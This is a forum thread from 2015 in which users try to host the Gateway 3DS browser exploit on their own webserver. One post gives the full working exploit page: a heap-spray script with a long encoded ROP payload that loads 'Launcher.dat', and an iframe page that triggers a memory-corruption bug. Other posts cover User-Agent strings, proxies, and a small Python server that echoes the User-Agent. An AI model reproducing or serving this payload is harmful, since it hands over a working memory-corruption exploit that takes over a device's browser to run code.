WIP: Getting Gateway website exploit running on local webserver

Discussion in '3DS - Flashcards & Custom Firmwares' started by Neptune, Jan 10, 2015.

  1. Neptune
    OP

    The magic numbers are based on the User-Agent that is sent over to the go.gateway-3ds.com website. I have copied my UA from my 3DS XL and dumped the HTML source from the Gateway site to one of my own, and it says "Failed to load web page" and after a few seconds dumps you back to the main menu with an error like what other people are getting when attempting to run the exploit, which requires them to clear cookies or some such. That's definitely not the cause in this case. If anyone has any ideas on what to do, please share. I don't like the idea of having to rely on their web server. It's gone down too many times recently :P
  2. Seanshoots

    HTML:
    <html>
    <head>
    <style>
        body {
            color:white;
            background:black;
        }
       
       
    </style>
    <script>
        function magicfun(mem, size, v) {
            var a = new Array(size - 20);
            nv = v + unescape("%ucccc");
            for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
            var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
     
            mem.push(t);
        }
     
        function dsm(evnt) {
            var mem = [];
     
            for (var j = 20; j < 430; j++) {
                magicfun(mem, j, unescape("\u57c4\u0010\u57c4\u0010\u57c4\u0010\u57c4\u0010\uc2fc\u0010\u50b3\u0010\uca34\u0019\u85f0\u08b8\u8008\u0018\ua00c\u001d\u46eb\u0019\u0000\u08f1\u8630\u08b8\u0001\u0000\ub020\u0039\uc01c\u001c\u6010\u002c\ufe0c\u0022\u1ff0\u0023\ubff0\u002c\u4000\u0012\udff4\u0033\u57c4\u0010\uc2fc\u0010\ua000\u0001\u8af4\u0022\u0004\u08f1\u7334\u0010\uc024\u001c\u46eb\u0019\u0000\u08f1\u0020\u08f1\u1000\u08f0\u4000\u0000\u5ff8\u0029\u3ffc\u0025\u86e0\u0016\ue030\u002b\u2010\u0021\u1f40\u0027\uc05c\u0020\ue0c4\u002d\u2000\u001b\uc2fc\u0010\u850c\u08b8\ubacc\u0011\u57c4\u0010\u8af4\u0022\u8281\ud582\u0658\u0035\udd48\u0011\u8af4\u0022\u850c\u08b8\u7334\u0010\u4850\u0035\uc2fc\u0010\u8618\u08b8\ubacc\u0011\u7f6d\u0012\u014c\u0010\u37e0\u0010\u848c\u08b8\u840c\u08b8\ubacc\u0011\ubb00\u0011\u57c4\u0010\u8af4\u0022\u0000\u0000\u0658\u0035\u03a0\u0013\u65a8\u0010\u1434\u0010\uff64\u0022\u03a0\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0b5c\u0010\ufe44\u0022\u57c4\u0010\u5ae0\u002c\u57c4\u0010\u8af4\u0022\u0658\u0035\u57c4\u0010\u2c93\u0018\uc2fc\u0010\u8618\u08b8\ubacc\u0011\udd48\u0011\u6694\u0010\u6694\u0010\u8af4\u0022\u0004\u0000\u0658\u0035\u0344\u0013\u8af4\u0022\u8618\u08b8\u7334\u0010\u0d24\u0010\u8af4\u0022\ub000\uf70f\u0658\u0035\u9864\u0011\u1a8c\u0015\u59c0\u0020\uc2fc\u0010\u8610\u08b8\u8af4\u0022\u0ffc\u08f0\u6694\u0010\u5fd4\u0035\u8af4\u0022\u84a8\u08b8\ufc24\u0010\u2215\u002c\u57c4\u0010\u57c4\u0010\u65a8\u0010\u5654\u002d\u3778\u0010\ua864\u002f\u9b94\u0011\ue780\u0020\u8605\u0012\u3da8\u0010\u85f8\u08b8\u57c4\u0010\u5ae0\u002c\udf28\u0010\uc8e4\u002f\u37e0\u0010\uc494\u0023\u0358\u0013\u1000\u08f0\u0344\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0344\u0013\u0064\u006d\u0063\u003a\u002f\u004c\u0061\u0075\u006e\u0063\u0068\u0065\u0072\u002e\u0064\u0061\u0074\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0344\u0013\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\
u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"));
            }
        }
    </script>
    </head>
    <body>
            <h1 align="center">GATEWAY 3DS LOADING...</h1>
            <iframe width=0 height=0 src="frame.html"></iframe>
    </body>
    </html>
    
    frame.html source
    HTML:
    <html>
        <head>
            <script>
                var nb = 0;
                function handleBeforeLoad() {
                    if (++nb == 1) {
                        p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                    } else if (nb == 2) {
                        p.removeChild(f);
                    }
                }
               
                function documentLoaded() {
                    f = window.frameElement;
                    p = f.parentNode;
                    var o = document.createElement("object");
                    o.addEventListener('beforeload', handleBeforeLoad, false);
                    document.body.appendChild(o);
                }
     
                window.onload = documentLoaded;
            </script>
        </head>
        <body>
            KEKEKEKEK...
        </body>
    </html>
    
  3. arielp

    They're using index.php; the actual URL is http://go.gateway-3ds.com/index.php

    Unfortunately the PHP source cannot be seen from the user side.

    If they're running some PHP code within it, you cannot replicate it.

    Unless you can reverse engineer it (which is not possible by only looking at the above HTML code), or you can get the index.php source from the Gateway team (unlikely).

    Most probably they're running something; otherwise they could just use index.html or index.htm.
  4. arielp

    That HTML code above has already been processed by PHP (on the web server) and only shows the HTML content / JavaScript. The PHP code itself cannot be seen, unless you find an exploit in their server, hack it, and then grab the index.php (and all related items).

    That's how PHP works.

    Sample PHP code:

    <?php
    $sample = "hello world";
    echo $sample;
    ?>

    What you see from the user's browser with "view source" is only:

    helloworld
     
  5. gamesquest1

    I wonder if "KEKEKEKEK..." is some trolling :P
     
  6. s-arash

    You can't exploit the browser with PHP because it's server side.

    So everything the Gateway webpage does is in JavaScript code, which is client side, and you can view it.
     
  7. Thomas12345

    Well, I managed to get the exploit up without connecting to the Gateway website...

    Basically I set up a proxy server on my Linux box, connected my 3DS to said proxy, dumped the index.html and frame.html, and created a simple web server to serve the two pages.

    Turns out the index.html I dumped with this method is different from what I got when I just changed my PC's web browser's user agent to the 3DS user agent.
  8. orochi115

    Many ways:
    - Packet sniffing
    - Custom UA string sent from curl
  9. Seanshoots

    I used Fiddler and set it up as a proxy on my 3DS. It's weird because the page I posted worked when I dumped it, but when I use Fiddler's autoresponder (loads pages locally instead of sending requests) or host them on my own server I only get an error. Don't know what's wrong, but I don't have a gateway card to do anything right now anyways.
     
  10. Duo8

    What do you think the php code is for? If it's just for detecting and distributing the payload then it shouldn't matter.
     
  11. Vappy

    Thomas12345 said he got it working, could try replicating his method. Of course that only gives you the static html for your 3DS configuration, and not the PHP script generating them, but that one set of pages would probably work for all other consoles of the same model and version. If someone made an archive of all combinations, it'd be a fine alternative to Gateway's own site.
  12. Duo8

    Maybe the php code is just for returning the correct site among pre made ones.
     
  13. Arkansaw

    Can someone put up the UA string and the payload section that differs? If enough people verify it, it is just a matter of time.
     
  14. hias

    The payload differs according to the user agent you are using. You need the correct user agent for your 3DS firmware version. You can find information about the user agent strings on 3dbrew:

    http://3dbrew.org/wiki/Internet_Browser

    The easiest way to get the correct agent for your 3DS is to set up a site on your local webserver which displays the user agent of the accessing web browser, then visit it with your 3DS. If it does not work when you use a proxy, the proxy is using a wrong user agent.

    Just use the user agent switcher addon for Firefox and you are good to go.
    Gateway uses PHP to supply the correct payload according to the user agent; no exploit is going on server side.

    You can also use sites like this

    http://www.whatsmyua.com
  15. Duo8

    Or just follow this:
    Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US

    <lang> is "en", "fr", etc. <region> is "US", "EU", etc. See below for <version>

    Version is in browser settings.
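Added example (not from the thread or from Gateway): a small Python server that does what hias describes, echoing the visiting browser's User-Agent and parsing it against the 3DS layout Duo8 quotes. The regex, the 8080 port and the sample UA strings are my assumptions.

```python
"""Local page that echoes and parses the visiting browser's User-Agent.

Point the 3DS browser at http://<this machine's LAN IP>:8080/ and the page
shows the UA the console (or a proxy on its behalf) actually sent.
"""
import re
from wsgiref.simple_server import make_server

# Assumed pattern for the 3DS browser UA quoted in the thread:
#   "Mozilla/5.0 (Nintendo 3DS; U; ; <lang>) Version/<version>.<region>"
UA_RE = re.compile(
    r"Mozilla/5\.0 \(Nintendo 3DS; U; ; (?P<lang>[a-z]{2})\) "
    r"Version/(?P<version>[\d.]+)\.(?P<region>[A-Z]{2})$"
)


def parse_3ds_ua(ua):
    """Return {'lang', 'version', 'region'} for a 3DS UA, or None if it is not one."""
    m = UA_RE.match(ua or "")
    return m.groupdict() if m else None


def describe_ua(ua):
    """Plain-text body shown to the visiting browser (and logged server side)."""
    fields = parse_3ds_ua(ua)
    lines = ["User-Agent: %s" % (ua or "(none)")]
    if fields:
        lines.append("Nintendo 3DS browser: lang=%(lang)s version=%(version)s "
                     "region=%(region)s" % fields)
    else:
        # A proxy that rewrites the UA is the failure mode hias mentions.
        lines.append("Not a Nintendo 3DS browser UA (a proxy may have replaced it)")
    return "\n".join(lines)


def app(environ, start_response):
    body = describe_ua(environ.get("HTTP_USER_AGENT")).encode("utf-8")
    print(body.decode("utf-8"))  # also log it, the console screen is small
    start_response("200 OK", [("Content-Type", "text/plain; charset=utf-8"),
                              ("Content-Length", str(len(body)))])
    return [body]


if __name__ == "__main__":
    make_server("0.0.0.0", 8080, app).serve_forever()
```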
  16. Neptune
    OP

    It's not generated using ONLY the UA. There is something else that is sent over.